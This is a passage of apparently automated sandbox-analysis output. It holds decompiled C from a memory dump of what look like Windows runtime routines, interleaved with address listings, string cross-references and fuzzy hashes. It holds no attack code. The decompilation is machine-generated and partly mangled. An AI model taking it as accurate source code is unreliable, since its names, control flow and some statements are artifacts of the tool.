							if(_t336 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E00F42AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t261 = E00F26600( *(_t317 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E00F42C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t268 = E00F42AE4( &_v36, _a8, _t292, _a16, _a20, _t336);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E00F42C50(_v36, _a8, _t292, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E00F42ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t336;
					}
					L70:
					return E00F6D0D1(_t254);
				}
				L108:
			}

0x00f42584
0x00f42586
0x00f42590
0x00f42596
0x00f42597
0x00f42598
0x00f42599
0x00f4259e
0x00f425a4
0x00f425a9
0x00f425ac
0x00f425ae
0x00f425b1
0x00f425b2
0x00f425b5
0x00f425b8
0x00f425bb
0x00f425bc
0x00f425bf
0x00f425c2
0x00f425c5
0x00f425c6
0x00f425cb
0x00f425ce
0x00f425d8
0x00f425dd
0x00f425de
0x00f425e1
0x00f425e3
0x00f425e9
0x00f426da
0x00f426da
0x00f426dd
0x00f426e2
0x00f85b56
0x00000000
0x00f426e8
0x00f426f9
0x00f426fb
0x00f426fe
0x00f42700
0x00f85b60
0x00000000
0x00f42706
0x00f42706
0x00f4270a
0x00f4270a
0x00f4270d
0x00f42713
0x00f42716
0x00f42718
0x00f4271c
0x00f4271e
0x00f85b6c
0x00f85b6f
0x00f85b7f
0x00f85b89
0x00f85b8e
0x00f85b93
0x00f85b96
0x00f85b9c
0x00f85ba0
0x00f85ba3
0x00f85bab
0x00f85bb0
0x00f85bb3
0x00f85bb3
0x00f85ba3
0x00f42724
0x00f42726
0x00f42729
0x00f4272c
0x00f4279d
0x00f4279d
0x00f427a0
0x00f427a2
0x00000000
0x00f4272e
0x00f4272e
0x00f42731
0x00f42734
0x00f42734
0x00f42736
0x00f85bc1
0x00f85bc1
0x00f85bc4
0x00000000
0x00f85bca
0x00f85bca
0x00f85bcd
0x00000000
0x00f85bd3
0x00000000
0x00f85bd3
0x00f85bcd
0x00f4273c
0x00f4273c
0x00f42742
0x00f42747
0x00f4274a
0x00f4274d
0x00f42750
0x00000000
0x00f42756
0x00f42756
0x00000000
0x00f42902
0x00f42908
0x00f4290b
0x00000000
0x00f42911
0x00f4291c
0x00f42921
0x00000000
0x00f42921
0x00000000
0x00000000
0x00f42880
0x00f42887
0x00f4288c
0x00000000
0x00000000
0x00f42805
0x00f4280a
0x00f42814
0x00f42816
0x00000000
0x00000000
0x00f4281e
0x00f42821
0x00f42823
0x00000000
0x00f42829
0x00f42829
0x00f42831
0x00f4283c
0x00f4283e
0x00000000
0x00f4283e
0x00000000
0x00000000
0x00f4284e
0x00f42850
0x00f42851
0x00f42854
0x00f42857
0x00f4285a
0x00f4285c
0x00f4285d
0x00000000
0x00000000
0x00f4275d
0x00f42761
0x00000000
0x00f42767
0x00f4276e
0x00f42773
0x00f42773
0x00f42776
0x00f42778
0x00f4277e
0x00f4277e
0x00f42781
0x00f42781
0x00f42783
0x00f42784
0x00000000
0x00000000
0x00f85bd8
0x00f85bde
0x00f85be4
0x00f85be6
0x00f85be8
0x00f85be9
0x00f85bee
0x00f85bf8
0x00f85bff
0x00f85c01
0x00f85c04
0x00f85c07
0x00f85c0b
0x00f85c0d
0x00f85c0d
0x00f85c15
0x00f85c18
0x00f85c1b
0x00f85c1b
0x00f85c1e
0x00000000
0x00000000
0x00f428c3
0x00f428c8
0x00f428d2
0x00f428d4
0x00f428d8
0x00f428db
0x00f85c26
0x00f85c28
0x00f85c2d
0x00f85c2d
0x00000000
0x00000000
0x00f85c34
0x00f85c36
0x00f85c49
0x00f85c4e
0x00f85c54
0x00f85c5b
0x00f85c5d
0x00f85c60
0x00f42788
0x00f42788
0x00f4278b
0x00f4278e
0x00f4278e
0x00f4278e
0x00f42791
0x00000000
0x00000000
0x00f42756
0x00f42750
0x00000000
0x00f42794
0x00f42794
0x00f42795
0x00f42798
0x00f42798
0x00000000
0x00f42734
0x00f4272c
0x00f42700
0x00f425ef
0x00f425ef
0x00f425ef
0x00f425f2
0x00f425f8
0x00000000
0x00000000
0x00f425fe
0x00000000
0x00f428e6
0x00f428ec
0x00f428ef
0x00f428f5
0x00f428f8
0x00f428f8
0x00000000
0x00f428f8
0x00000000
0x00000000
0x00f42866
0x00f42866
0x00f42876
0x00f42879
0x00000000
0x00000000
0x00f427e0
0x00f427e7
0x00f427e9
0x00f427eb
0x00f85afd
0x00000000
0x00f85afd
0x00000000
0x00000000
0x00f42633
0x00f42638
0x00f4263b
0x00f4263c
0x00f4263e
0x00f42640
0x00f42642
0x00f42647
0x00f42649
0x00f4264e
0x00f42650
0x00f42653
0x00f42659
0x00f426a2
0x00f426a7
0x00f426ac
0x00f426b2
0x00f85b11
0x00f85b15
0x00f85b17
0x00000000
0x00f426b8
0x00f426b8
0x00f426ba
0x00f427a6
0x00f427a6
0x00f427a9
0x00f427ab
0x00f427b9
0x00f427b9
0x00f427be
0x00f427c1
0x00f427c3
0x00f427c5
0x00f427c7
0x00f85c74
0x00f85c79
0x00f85c79
0x00f427c7
0x00000000
0x00f426c0
0x00f426c0
0x00f426c3
0x00f426c6
0x00f426c6
0x00f426c9
0x00f426c9
0x00000000
0x00f426c9
0x00f426ba
0x00f4265b
0x00f4265b
0x00f4265e
0x00f42667
0x00f4266d
0x00f42677
0x00f4267c
0x00f4267f
0x00f42681
0x00f85b49
0x00f85b4e
0x00f427cd
0x00f427d0
0x00f427d1
0x00f427d2
0x00f427d4
0x00f427dd
0x00f42687
0x00f42687
0x00f4268a
0x00f4268b
0x00f4268e
0x00f4268f
0x00f42691
0x00f42696
0x00f42698
0x00f4269d
0x00f4269f
0x00000000
0x00f4269f
0x00f42681
0x00000000
0x00000000
0x00f42846
0x00000000
0x00000000
0x00f42605
0x00f4260a
0x00f4260c
0x00f42611
0x00f42616
0x00f42619
0x00f42619
0x00f4261e
0x00000000
0x00f42624
0x00f42627
0x00f42627
0x00000000
0x00000000
0x00f85b1f
0x00000000
0x00000000
0x00f42894
0x00f4289b
0x00f4289d
0x00f428a1
0x00f85b2b
0x00f85b2e
0x00f85b2e
0x00f428a7
0x00f428a9
0x00f85b04
0x00f85b09
0x00f85b09
0x00f85b09
0x00000000
0x00000000
0x00f85b35
0x00f85b3c
0x00f428fb
0x00f428fb
0x00f426cc
0x00f426cc
0x00f426d0
0x00000000
0x00f426d2
0x00f426d2
0x00000000
0x00f426d2
0x00000000
0x00000000
0x00f425fe
0x00f4292d
0x00f4292f
0x00f42930
0x00f42935
0x00f42937
0x00f42938
0x00f4293b
0x00f4293c
0x00f4293e
0x00f4293f
0x00f42940
0x00f42942
0x00f42944
0x00f42947
0x00f42948
0x00f4294e
0x00f4294f
0x00f42950
0x00f42957
0x00f42958
0x00f4295a
0x00f4295c
0x00f42962
0x00f42963
0x00f42964
0x00f42968
0x00f4296b
0x00f4296c
0x00f4296f
0x00f42972
0x00f42973
0x00f42974
0x00f4297b
0x00f4297e
0x00f4297f
0x00f42980
0x00f42981
0x00f42982
0x00f42983
0x00f42984
0x00f42985
0x00f42986
0x00f42987
0x00f42988
0x00f42989
0x00f4298a
0x00f4298b
0x00f4298c
0x00f4298d
0x00f4298e
0x00f4298f
0x00f42990
0x00f42992
0x00f42997
0x00f429a3
0x00f429a6
0x00f429ab
0x00f429ad
0x00f429b0
0x00f429b2
0x00f85c80
0x00f429b8
0x00f429b8
0x00f429bb
0x00f429c0
0x00f429c5
0x00f429c6
0x00f429c6
0x00f429c9
0x00f429cb
0x00000000
0x00000000
0x00f429cd
0x00f429d0
0x00f429d9
0x00f429db
0x00f429dd
0x00f42a7f
0x00f42a84
0x00f42a87
0x00f42a89
0x00f85ca1
0x00f85ca3
0x00000000
0x00f42a8f
0x00f42a8f
0x00000000
0x00f42a8f
0x00000000
0x00f429e3
0x00f429e3
0x00f429e3
0x00000000
0x00f429e3
0x00f429dd
0x00000000
0x00f429db
0x00f429e6
0x00f429e9
0x00f429eb
0x00f429ed
0x00f429f3
0x00f429f5
0x00f429f8
0x00f429fa
0x00f42a97
0x00f42a9a
0x00f42a9d
0x00f42add
0x00000000
0x00f42a9f
0x00f42aa2
0x00f42aa5
0x00f42aa8
0x00f42aab
0x00f85cab
0x00f85caf
0x00f85cc5
0x00f85cda
0x00f85cdc
0x00f85cdf
0x00f85ce5
0x00000000
0x00f85ceb
0x00f85ced
0x00f85cee
0x00000000
0x00f85cee
0x00f85cb1
0x00f85cb4
0x00f85cb9
0x00f85cbb
0x00000000
0x00f85cbd
0x00f85cbd
0x00000000
0x00f85cbd
0x00f85cbb
0x00f42ab1
0x00f42ab1
0x00f42ac4
0x00f42ac6
0x00f42ac6
0x00000000
0x00f42ac6
0x00f42aab
0x00000000
0x00f42a00
0x00f42a09
0x00f42a0e
0x00f42a21
0x00f42a24
0x00f42a35
0x00f42a3a
0x00f42a3d
0x00f42a42
0x00f42a59
0x00f42a59
0x00f42a5c
0x00f42a5f
0x00f42a5f
0x00f429fa
0x00f429f3
0x00f42a64
0x00f42a64
0x00f42a6b
0x00f42a6b
0x00f42a6d
0x00f42a72
0x00f42a72
0x00000000

Strings

PATH, xrefs: 00F42642, 00F42691

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 705441f993989bc997f683cecd7a7a57fcc2655c49e0fd97e750cad3fa7120d1
Instruction ID: 705be5c897cb97a4d6de882d421fa98a6e456b2ee952416d69b6c9286c5721b4
Opcode Fuzzy Hash: 705441f993989bc997f683cecd7a7a57fcc2655c49e0fd97e750cad3fa7120d1
Instruction Fuzzy Hash: 4FC1C172D00219DBDB65DF99D881BADBBB1FF48710F954029F941AB250DB38A805EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F4FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00F4FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00F2EEF0(0x1007b60);
					_t134 =  *0x1007b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1007b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1007b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00F26D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00F276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00FB8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00F1B150();
													}
													_t116 = E00FB6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00F275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1008638; // 0x0
																	_t122 = L00F238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00F276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00F276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00F4FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00F270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00F4FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00F4FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00F4FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00F4FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00F4FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1007b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1007b84 = _t75;
						_t73 = E00F2EB70(_t134, 0x1007b60);
						if( *0x1007b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00F2FF60( *0x1007b20);
							}
						}
						goto L5;
					}
				}
			}

0x00f4fab0
0x00f4fab2
0x00f4fab3
0x00f4fab4
0x00f4fabc
0x00f4fac0
0x00f4fb14
0x00f4fb17
0x00f4fac2
0x00f4fac8
0x00f4facd
0x00f4fad3
0x00f4fad3
0x00f4fadd
0x00f4fb18
0x00f4fb1b
0x00f4fb1d
0x00f4fb1e
0x00f4fb1f
0x00f4fb20
0x00f4fb21
0x00f4fb22
0x00f4fb23
0x00f4fb24
0x00f4fb25
0x00f4fb26
0x00f4fb27
0x00f4fb28
0x00f4fb29
0x00f4fb2a
0x00f4fb2b
0x00f4fb2c
0x00f4fb2d
0x00f4fb2e
0x00f4fb2f
0x00f4fb3a
0x00f4fb3b
0x00f4fb3e
0x00f4fb41
0x00f4fb44
0x00f4fb47
0x00f4fb4a
0x00f4fb4d
0x00f4fb53
0x00f8bdcb
0x00f8bdcb
0x00f4fb59
0x00f4fb5b
0x00f4fb5b
0x00f4fb5e
0x00f8bdd5
0x00f8bdd8
0x00000000
0x00f8bdda
0x00000000
0x00f8bdda
0x00f4fb64
0x00f4fb64
0x00f4fb64
0x00f4fb67
0x00f4fb6e
0x00f4fb70
0x00f4fb72
0x00000000
0x00f4fb78
0x00f4fb7a
0x00f4fb7a
0x00f4fb7d
0x00f4fb80
0x00f8bddf
0x00f8bde1
0x00000000
0x00f8bde3
0x00000000
0x00f8bde3
0x00f4fb86
0x00f4fb86
0x00f4fb86
0x00f4fb8b
0x00f4fb90
0x00f4fb92
0x00f4fb94
0x00f4fb9a
0x00f4fb9b
0x00f4fba1
0x00f8bde8
0x00f8bdeb
0x00f8bded
0x00f8beb5
0x00f8beb5
0x00f8bebb
0x00f8bebd
0x00f8bec3
0x00f8bed2
0x00f8bedd
0x00f8bedd
0x00f8beed
0x00000000
0x00f8bdf3
0x00f8bdfe
0x00f8be06
0x00f8be0b
0x00f8be0d
0x00f8be0f
0x00f8be14
0x00f8be19
0x00f8be20
0x00f8be25
0x00f8be27
0x00f8be35
0x00f8be39
0x00f8be46
0x00f8be4f
0x00f8be54
0x00f8be56
0x00f8bef8
0x00f8bef8
0x00000000
0x00f8be5c
0x00f8be5c
0x00f8be60
0x00000000
0x00f8be66
0x00f8be66
0x00f8be7f
0x00f8be84
0x00f8be87
0x00f8be89
0x00f8be8b
0x00f8be99
0x00f8be9d
0x00f8bea0
0x00f8beac
0x00f8beaf
0x00f8beb1
0x00f8beb3
0x00f8beb3
0x00000000
0x00f8bea2
0x00f8bea2
0x00000000
0x00f8bea2
0x00f8be8d
0x00f8be8d
0x00f8be92
0x00000000
0x00f8be92
0x00f8be8b
0x00f8be60
0x00f8be3b
0x00f8be3b
0x00f8be3e
0x00000000
0x00f8be40
0x00f8be40
0x00f8be44
0x00000000
0x00000000
0x00000000
0x00000000
0x00f8be44
0x00f8be3e
0x00f8be29
0x00f8be29
0x00000000
0x00f8be29
0x00f8be27
0x00000000
0x00f4fba7
0x00f4fba7
0x00f4fbab
0x00f8bf02
0x00f4fbb1
0x00f4fbb1
0x00f4fbb8
0x00f4fbbd
0x00f4fbbd
0x00f4fbbf
0x00f4fbbf
0x00f4fbc5
0x00f4fbcb
0x00f4fbf8
0x00f4fbf8
0x00f4fbfa
0x00000000
0x00f4fc00
0x00f4fc00
0x00f4fc03
0x00000000
0x00f4fc09
0x00f4fc09
0x00f4fc0f
0x00f4fc15
0x00f4fc23
0x00f4fc23
0x00f4fc25
0x00f4fc27
0x00f4fc75
0x00f4fc7c
0x00f4fc84
0x00000000
0x00f4fc29
0x00f4fc29
0x00f4fc2d
0x00f4fc30
0x00f8bf0f
0x00000000
0x00f4fc36
0x00f4fc38
0x00f4fc3b
0x00f4fc41
0x00f8bf17
0x00f8bf19
0x00f8bf48
0x00f8bf4b
0x00000000
0x00f8bf1b
0x00f8bf22
0x00f8bf24
0x00f8bf26
0x00000000
0x00f8bf2c
0x00f8bf37
0x00f8bf39
0x00f8bf3b
0x00000000
0x00f8bf41
0x00f8bf41
0x00f8bf41
0x00f8bf41
0x00f8bf45
0x00000000
0x00f8bf45
0x00f8bf3b
0x00f8bf26
0x00000000
0x00f4fc47
0x00f4fc47
0x00f4fc49
0x00f4fcb2
0x00f4fcb4
0x00f4fcb6
0x00f4fcdc
0x00f4fcdc
0x00000000
0x00f4fcb8
0x00f4fcc3
0x00f4fcc5
0x00f4fcc7
0x00000000
0x00f4fcc9
0x00f4fcc9
0x00f4fccd
0x00000000
0x00f4fccd
0x00f4fcc7
0x00000000
0x00f4fc4b
0x00f4fc4b
0x00f4fc4e
0x00f4fc4e
0x00f4fc51
0x00f4fc51
0x00f4fc54
0x00f4fc5a
0x00f4fc5c
0x00f4fc5f
0x00f4fc61
0x00f4fc63
0x00f4fc65
0x00f4fc67
0x00f4fc6e
0x00f4fc72
0x00f4fc72
0x00f4fc72
0x00f4fc72
0x00f4fc67
0x00f4fc61
0x00000000
0x00f4fc5a
0x00f4fc49
0x00f4fc41
0x00f4fc30
0x00f4fc27
0x00f4fc03
0x00f4fbcd
0x00f4fbd3
0x00f4fbd9
0x00f4fbdc
0x00f4fbde
0x00f4fc99
0x00f4fc9b
0x00f4fc9d
0x00f4fcd5
0x00f4fcd5
0x00f4fc89
0x00f4fc89
0x00000000
0x00f4fc9f
0x00f4fc9f
0x00f4fca3
0x00000000
0x00f4fca3
0x00000000
0x00f4fbe4
0x00f4fbe4
0x00f4fbe4
0x00f4fbe4
0x00f4fbe9
0x00f4fbf2
0x00000000
0x00f4fbf2
0x00f4fbde
0x00f4fbcb
0x00f4fbab
0x00f4fc8b
0x00f4fc8b
0x00f4fc8c
0x00f4fb80
0x00f4fb72
0x00f4fb5e
0x00f4fc8d
0x00f4fc91
0x00f4fadf
0x00f4fadf
0x00f4fae1
0x00f4fae4
0x00f4fae7
0x00f4faec
0x00f4faf8
0x00f4fb00
0x00f4fb07
0x00f4fb0f
0x00f4fb0f
0x00f4fb07
0x00000000
0x00f4faf8
0x00f4fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00F8BE0F

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 6218cccb16c4a44ed2ccb4f6115b60c91e31f0b014a314acc4fb1bccab839111
Instruction ID: 2ab7c7b27b06b0dc586f3e8fbbd4084c20ffb5c37e98aa6cf287533a899efcda
Opcode Fuzzy Hash: 6218cccb16c4a44ed2ccb4f6115b60c91e31f0b014a314acc4fb1bccab839111
Instruction Fuzzy Hash: 92A10632F0060A9FDB21DF64C890BAABBA4AF44720F144579ED4ADB681DB34DD09EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00F403E2, Relevance: 1.5, Strings: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00F403E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x100d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E00F40548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E00F5B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00F2B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1007c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E00F37D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E00F37D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
